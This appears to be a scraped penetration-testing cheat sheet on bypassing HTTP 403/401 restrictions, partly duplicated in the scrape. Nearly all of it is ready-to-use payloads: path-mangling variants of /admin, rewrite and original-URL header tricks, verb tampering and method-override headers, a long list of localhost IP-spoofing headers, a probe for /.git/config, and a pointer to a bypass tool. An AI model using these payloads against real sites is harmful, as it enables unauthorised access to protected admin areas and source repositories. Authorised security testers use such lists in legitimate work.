Bypass 403 / 401

/admin -> 403

/Admin
/AdMin
/admin/
/admin/. 
//admin//
/.;/admin
/./admin/..
/admin.json
/;/admin
//;//admin
/admi%6e [n is url encoded to %6e]
/%2e/admin
/admin..;/
/admin%20
/admin%09
/admin/..;/
/static../admin.jsp

Git

If a path with .git/ = 403, then /.git/config might be 200!

Wordpress

X-Rewrite-Url Header can be used to bypass WordPress 403 pages.

POST /xmlrpc HTTP/1.1       
Host: https://blah.com
X-Rewrite-Url: xmlrpc.php
X-Rewrite-Url: wp-json/v2/users
X-Rewrite-Url: wp-login.php

Burp Extensions - 403 Bypasser

HTTP Verb Tampering

Change request method from GET to TRACE, etc.

Fuzz

· /FUZZ/admin

· /admin/FUZZ

· /adminFUZZ

Content-Length:0

curl -X POST -H “Content-Length:0” https://www.redacted.com

HTTP Verb Tampering

GET /admin HTTP/1.1
Host: target.com

Change method like this way:

POST /admin HTTP/1.1
Host: target.com

If the application supports method override header then you can also test like this way:

POST /admin HTTP/1.1
Host: target.com
X-http-method-override: GET

Or

X-http-override: GET

403 Header Bypass

GET /anything HTTP/1.1
Host: target.com
X-Original-URL: /admin

OR

GET /anything HTTP/1.1
Host: target.com
X-Rewrite-URL: /admin

Base-Url: 127.0.0.1
Client-IP: 127.0.0.1
Http-Url: 127.0.0.1
Proxy-Host: 127.0.0.1
Proxy-Url: 127.0.0.1
Real-Ip: 127.0.0.1
Redirect: 127.0.0.1
Referer: 127.0.0.1
Referrer: 127.0.0.1
Refferer: 127.0.0.1
Request-Uri: 127.0.0.1
Uri: 127.0.0.1
Url: 127.0.0.1
X-Client-IP: 127.0.0.1
X-Custom-IP-Authorization: 127.0.0.1
X-Forward-For: 127.0.0.1
X-Forwarded-By: 127.0.0.1
X-Forwarded-For-Original: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Forwarded-Host: 127.0.0.1
X-Forwarded-Port: 443
X-Forwarded-Port: 4443
X-Forwarded-Port: 80
X-Forwarded-Port: 8080
X-Forwarded-Port: 8443
X-Forwarded-Scheme: http
X-Forwarded-Scheme: https
X-Forwarded-Server: 127.0.0.1
X-Forwarded: 127.0.0.1
X-Forwarder-For: 127.0.0.1
X-Host: 127.0.0.1
X-Http-Destinationurl: 127.0.0.1
X-Http-Host-Override: 127.0.0.1
X-Original-Remote-Addr: 127.0.0.1
X-Original-Url: 127.0.0.1
X-Originating-IP: 127.0.0.1
X-Proxy-Url: 127.0.0.1
X-Real-Ip: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Rewrite-Url: 127.0.0.1
X-True-IP: 127.0.0.1

Tools

# byp4xx $TARGET

PreviousFuzzing NextRegistration Form

Last updated 1 day ago

/admin -> 403 /Admin /AdMin /admin/ /admin/. //admin// /.;/admin /./admin/.. /admin.json /;/admin //;//admin /admi%6e [n is url encoded to %6e] /%2e/admin /admin..;/ /admin%20 /admin%09 /admin/..;/ /static../admin.jsp

HTTP Verb Tampering

GET /admin HTTP/1.1
Host: target.com

Change method like this way:

POST /admin HTTP/1.1
Host: target.com

If the application supports method override header then you can also test like this way:

POST /admin HTTP/1.1
Host: target.com
X-http-method-override: GET

Or

X-http-override: GET

403 Header Bypass

GET /anything HTTP/1.1
Host: target.com
X-Original-URL: /admin

OR

GET /anything HTTP/1.1
Host: target.com
X-Rewrite-URL: /admin

Base-Url: 127.0.0.1
Client-IP: 127.0.0.1
Http-Url: 127.0.0.1
Proxy-Host: 127.0.0.1
Proxy-Url: 127.0.0.1
Real-Ip: 127.0.0.1
Redirect: 127.0.0.1
Referer: 127.0.0.1
Referrer: 127.0.0.1
Refferer: 127.0.0.1
Request-Uri: 127.0.0.1
Uri: 127.0.0.1
Url: 127.0.0.1
X-Client-IP: 127.0.0.1
X-Custom-IP-Authorization: 127.0.0.1
X-Forward-For: 127.0.0.1
X-Forwarded-By: 127.0.0.1
X-Forwarded-For-Original: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Forwarded-Host: 127.0.0.1
X-Forwarded-Port: 443
X-Forwarded-Port: 4443
X-Forwarded-Port: 80
X-Forwarded-Port: 8080
X-Forwarded-Port: 8443
X-Forwarded-Scheme: http
X-Forwarded-Scheme: https
X-Forwarded-Server: 127.0.0.1
X-Forwarded: 127.0.0.1
X-Forwarder-For: 127.0.0.1
X-Host: 127.0.0.1
X-Http-Destinationurl: 127.0.0.1
X-Http-Host-Override: 127.0.0.1
X-Original-Remote-Addr: 127.0.0.1
X-Original-Url: 127.0.0.1
X-Originating-IP: 127.0.0.1
X-Proxy-Url: 127.0.0.1
X-Real-Ip: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Rewrite-Url: 127.0.0.1
X-True-IP: 127.0.0.1